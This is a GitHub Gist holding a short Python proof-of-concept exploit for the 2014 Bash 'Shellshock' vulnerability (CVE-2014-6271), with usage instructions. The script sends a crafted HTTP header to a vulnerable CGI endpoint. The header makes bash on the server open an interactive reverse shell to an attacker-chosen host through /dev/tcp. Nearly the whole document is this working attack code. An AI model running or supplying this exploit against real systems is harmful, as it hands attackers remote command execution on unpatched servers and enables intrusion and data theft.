Created
September 25, 2014 01:24
-
-
Save metahertz/bc9689c60d4c9c5a2538 to your computer and use it in GitHub Desktop.
CVE-2014-6271 CGI Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Reverse shell using bash and /dev/tcp | |
# PoC for CVE-2014-6271 BASH RCE | |
# | |
import httplib,urllib,sys | |
if (len(sys.argv)<4): | |
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] | |
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] | |
exit(0) | |
conn = httplib.HTTPConnection(sys.argv[1]) | |
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] | |
headers = {"Content-type": "application/x-www-form-urlencoded", | |
"test":reverse_shell } | |
conn.request("GET",sys.argv[2],headers=headers) | |
res = conn.getresponse() | |
print res.status, res.reason | |
data = res.read() | |
print data |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment